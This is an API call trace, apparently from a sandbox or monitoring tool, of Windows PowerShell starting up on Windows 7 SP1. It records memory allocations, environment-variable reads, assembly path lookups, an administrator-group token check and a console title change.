	[0482.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30aa40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.235] CoTaskMemFree (pv=0x30aa40) 
	[0482.236] CoTaskMemAlloc (cb=0x104) returned 0x30aa40
	[0482.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30aa40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.237] CoTaskMemFree (pv=0x30aa40) 
	[0482.270] CoTaskMemAlloc (cb=0x104) returned 0x30aa40
	[0482.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30aa40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.270] CoTaskMemFree (pv=0x30aa40) 
	[0482.272] CoTaskMemAlloc (cb=0x104) returned 0x30aa40
	[0482.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30aa40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.272] CoTaskMemFree (pv=0x30aa40) 
	[0482.273] CoTaskMemAlloc (cb=0x104) returned 0x30aa40
	[0482.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30aa40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.273] CoTaskMemFree (pv=0x30aa40) 
	[0485.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0485.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0485.505] CoTaskMemAlloc (cb=0x104) returned 0x30aa40
	[0485.505] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30aa40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.505] CoTaskMemFree (pv=0x30aa40) 
	[0485.509] CoTaskMemAlloc (cb=0x104) returned 0x30aa40
	[0485.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30aa40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0485.509] CoTaskMemFree (pv=0x30aa40) 
	[0486.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0486.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0493.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0493.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0496.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0496.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0497.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0497.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0500.728] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0500.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0500.728] CoTaskMemFree (pv=0x30ac60) 
	[0500.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0500.729] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0500.730] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0501.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xed440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0501.370] SetErrorMode (uMode=0x1) returned 0x1
	[0501.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xed6c0 | out: lpFileInformation=0xed6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0501.370] SetErrorMode (uMode=0x1) returned 0x1
	[0503.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0503.532] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0503.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.532] CoTaskMemFree (pv=0x30ac60) 
	[0503.534] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0503.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.535] CoTaskMemFree (pv=0x30ac60) 
	[0503.535] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0503.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.535] CoTaskMemFree (pv=0x30ac60) 
	[0503.537] CoCreateGuid (in: pguid=0xeda88 | out: pguid=0xeda88*(Data1=0x7dd9bac4, Data2=0x93c1, Data3=0x42c0, Data4=([0]=0xad, [1]=0xfa, [2]=0xf7, [3]=0x18, [4]=0xef, [5]=0x1d, [6]=0xe1, [7]=0x8e))) returned 0x0
	[0503.541] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0503.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.541] CoTaskMemFree (pv=0x30ac60) 
	[0503.543] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0503.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.543] CoTaskMemFree (pv=0x30ac60) 
	[0503.546] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0503.546] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.546] CoTaskMemFree (pv=0x30ac60) 
	[0503.553] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0504.243] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xed730 | out: lpConsoleScreenBufferInfo=0xed730) returned 1
	[0504.250] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0504.251] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xed730 | out: lpConsoleScreenBufferInfo=0xed730) returned 1
	[0504.252] GetVersionExW (in: lpVersionInformation=0xed6c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xed6c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0504.255] GetCurrentProcess () returned 0xffffffffffffffff
	[0504.255] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xed758 | out: TokenHandle=0xed758*=0x30c) returned 1
	[0504.260] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed678 | out: TokenInformation=0x0, ReturnLength=0xed678) returned 0
	[0504.261] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d2060
	[0504.261] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x2d2060, TokenInformationLength=0x4, ReturnLength=0xed678 | out: TokenInformation=0x2d2060, ReturnLength=0xed678) returned 1
	[0504.261] DuplicateTokenEx (in: hExistingToken=0x30c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xed7d8 | out: phNewToken=0xed7d8*=0x308) returned 1
	[0504.261] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xed678 | out: TokenInformation=0x0, ReturnLength=0xed678) returned 0
	[0504.262] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2d2030
	[0504.262] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x2d2030, TokenInformationLength=0x4, ReturnLength=0xed678 | out: TokenInformation=0x2d2030, ReturnLength=0xed678) returned 1
	[0504.262] CheckTokenMembership (in: TokenHandle=0x308, SidToCheck=0x2d2f668*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xed7e8 | out: IsMember=0xed7e8) returned 1
	[0504.262] CloseHandle (hObject=0x308) returned 1
	[0504.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0504.791] CoTaskMemAlloc (cb=0x804) returned 0x1b83b880
	[0504.792] GetConsoleTitleW (in: lpConsoleTitle=0x1b83b880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0504.792] CoTaskMemFree (pv=0x1b83b880) 
	[0505.304] CoTaskMemAlloc (cb=0x804) returned 0x1b83c130
	[0505.304] GetConsoleTitleW (in: lpConsoleTitle=0x1b83c130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0505.304] CoTaskMemFree (pv=0x1b83c130) 
	[0505.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0505.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0505.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0505.307] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0506.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0506.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0507.685] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0507.687] CoCreateGuid (in: pguid=0xed8d0 | out: pguid=0xed8d0*(Data1=0xfed2f70b, Data2=0x14db, Data3=0x4ecd, Data4=([0]=0x98, [1]=0x50, [2]=0x9a, [3]=0x9, [4]=0x6c, [5]=0x12, [6]=0xee, [7]=0xa4))) returned 0x0
	[0507.689] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0507.689] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.689] CoTaskMemFree (pv=0x30ac60) 
	[0508.241] WinSqmIsOptedIn () returned 0x0
	[0508.242] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.242] CoTaskMemFree (pv=0x30ac60) 
	[0508.243] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.243] CoTaskMemFree (pv=0x30ac60) 
	[0508.243] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.243] CoTaskMemFree (pv=0x30ac60) 
	[0508.244] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0508.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.244] CoTaskMemFree (pv=0x30ac60) 
